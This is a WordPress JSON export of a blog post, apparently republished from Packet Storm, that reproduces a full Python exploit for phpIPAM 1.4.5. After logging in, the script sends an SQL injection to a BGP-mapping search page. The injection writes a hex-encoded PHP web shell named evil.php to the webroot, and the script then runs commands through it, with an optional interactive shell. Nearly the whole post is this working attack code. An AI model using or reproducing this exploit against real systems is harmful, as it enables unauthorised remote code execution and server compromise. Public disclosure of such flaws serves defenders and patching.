{"id":25931,"date":"2022-06-20T05:50:02","date_gmt":"2022-06-20T01:50:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167518\/phpipam145-exec.txt"},"modified":"2022-06-26T10:00:49","modified_gmt":"2022-06-26T05:30:49","slug":"phpipam-1-4-5-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/phpipam-1-4-5-remote-code-execution\/","title":{"rendered":"phpIPAM 1.4.5 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: phpIPAM 1.4.5 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 2022-04-10
\n# Exploit Author: Guilherme ‘@behiNdyk1’ Alves
\n# Vendor Homepage: https:\/\/phpipam.net\/
\n# Software Link: https:\/\/github.com\/phpipam\/phpipam\/releases\/tag\/v1.4.5
\n# Version: 1.4.5
\n# Tested on: Linux Ubuntu 20.04.3 LTS<\/p>\n

#!\/usr\/bin\/env python3<\/p>\n

import requests
\nimport argparse
\nfrom sys import exit, argv
\nfrom termcolor import colored<\/p>\n

banner = “””
\n\u2588\u2580\u2588 \u2588\u2591\u2588 \u2588\u2580\u2588 \u2588 \u2588\u2580\u2588 \u2584\u2580\u2588 \u2588\u2580\u2584\u2580\u2588 \u2584\u2588 \u2591 \u2588\u2591\u2588 \u2591 \u2588\u2580 \u2588\u2580 \u2588\u2580\u2588 \u2588\u2591\u2591 \u2588 \u2580\u2588\u2580 \u2588\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2580 \u2588\u2580\u2580
\n\u2588\u2580\u2580 \u2588\u2580\u2588 \u2588\u2580\u2580 \u2588 \u2588\u2580\u2580 \u2588\u2580\u2588 \u2588\u2591\u2580\u2591\u2588 \u2591\u2588 \u2584 \u2580\u2580\u2588 \u2584 \u2584\u2588 \u2584\u2588 \u2580\u2580\u2588 \u2588\u2584\u2584 \u2588 \u2591\u2588\u2591 \u2588\u2584\u2588 \u2588\u2580\u2584 \u2588\u2584\u2584 \u2588\u2588\u2584<\/p>\n

\u2588\u2584\u2584 \u2588\u2584\u2588 \u2588\u2584\u2584 \u2588\u2580\u2580 \u2588\u2591\u2588 \u2588 \u2588\u2584\u2591\u2588 \u2588\u2580\u2584 \u2588\u2584\u2588 \u2588\u2580 \u2588\u2580\u2580 \u2588\u2580\u2580
\n\u2588\u2584\u2588 \u2591\u2588\u2591 \u2588\u2584\u2588 \u2588\u2588\u2584 \u2588\u2580\u2588 \u2588 \u2588\u2591\u2580\u2588 \u2588\u2584\u2580 \u2591\u2588\u2591 \u2584\u2588 \u2588\u2588\u2584 \u2588\u2584\u2584\\n”””
\nprint(banner)<\/p>\n

parser = argparse.ArgumentParser(usage=”.\/exploit.py -url http:\/\/domain.tld\/ipam_base_url -usr username -pwd password -cmd ‘command_to_execute’ –path \/system\/writable\/path\/to\/save\/shell”, description=”phpIPAM 1.4.5 – (Authenticated) SQL Injection to RCE”)<\/p>\n

parser.add_argument(“-url”, type=str, help=”URL to vulnerable IPAM”, required=True)
\nparser.add_argument(“-usr”, type=str, help=”Username to log in as”, required=True)
\nparser.add_argument(“-pwd”, type=str, help=”User’s password”, required=True)
\nparser.add_argument(“-cmd”, type=str, help=”Command to execute”, default=”id”)
\nparser.add_argument(“–path”, type=str, help=”Path to writable system folder and accessible via webserver (default: \/var\/www\/html)”, default=”\/var\/www\/html”)
\nparser.add_argument(“–shell”, type=str, help=”Spawn a shell (non-interactive)”, nargs=”?”)
\nargs = parser.parse_args()<\/p>\n

url = args.url
\nusername = args.usr
\npassword = args.pwd
\ncommand = args.cmd
\npath = args.path<\/p>\n

# Validating url
\nif url.endswith(“\/”):
\nurl = url[:-1]\nif not url.startswith(“http:\/\/”) and not url.startswith(“https:\/\/”):
\nprint(colored(“[!] Please specify a valid scheme (http:\/\/ or https:\/\/) before the domain.”, “yellow”))
\nexit()<\/p>\n

def login(url, username, password):
\n“””Takes an username and a password and tries to execute a login (IPAM)”””
\ndata = {
\n“ipamusername”: username,
\n“ipampassword”: password
\n}
\nprint(colored(f”[…] Trying to log in as {username}”, “blue”))
\nr = requests.post(f”{url}\/app\/login\/login_check.php”, data=data)
\nif “Invalid username or password” in r.text:
\nprint(colored(f”[-] There’s an error when trying to log in using these credentials –> {username}:{password}”, “red”))
\nexit()
\nelse:
\nprint(colored(“[+] Login successful!”, “green”))
\nreturn str(r.cookies[‘phpipam’])<\/p>\n

auth_cookie = login(url, username, password)<\/p>\n

def exploit(url, auth_cookie, path, command):
\nprint(colored(“[…] Exploiting”, “blue”))
\nvulnerable_path = “app\/admin\/routing\/edit-bgp-mapping-search.php”
\ndata = {
\n“subnet”: f”\\” Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE ‘{path}\/evil.php’ — -“,
\n“bgp_id”: “1”
\n}
\ncookies = {
\n“phpipam”: auth_cookie
\n}
\nrequests.post(f”{url}\/{vulnerable_path}”, data=data, cookies=cookies)
\ntest = requests.get(f”{url}\/evil.php”)
\nif test.status_code != 200:
\nreturn print(colored(f”[-] Something went wrong. Maybe the path isn’t writable. You can still abuse of the SQL injection vulnerability at {url}\/index.php?page=tools&section=routing&subnetId=bgp&sPage=1″, “red”))
\nif “–shell” in argv:
\nwhile True:
\ncommand = input(“Shell> “)
\nr = requests.get(f”{url}\/evil.php?cmd={command}”)
\nprint(r.text)
\nelse:
\nprint(colored(f”[+] Success! The shell is located at {url}\/evil.php. Parameter: cmd”, “green”))
\nr = requests.get(f”{url}\/evil.php?cmd={command}”)
\nprint(f”\\n\\n[+] Output:\\n{r.text}”)<\/p>\n

exploit(url, auth_cookie, path, command)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: phpIPAM 1.4.5 – Remote Code Execution (RCE) (Authenticated) # Date: 2022-04-10 # Exploit Author: Guilherme ‘@behiNdyk1’ Alves # Vendor Homepage: https:\/\/phpipam.net\/ # Software Link: https:\/\/github.com\/phpipam\/phpipam\/releases\/tag\/v1.4.5 # Version: 1.4.5 # Tested on: Linux Ubuntu 20.04.3 LTS #!\/usr\/bin\/env python3 import requests import argparse from sys import exit, argv from termcolor import colored banner = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25931","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25931"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25931\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}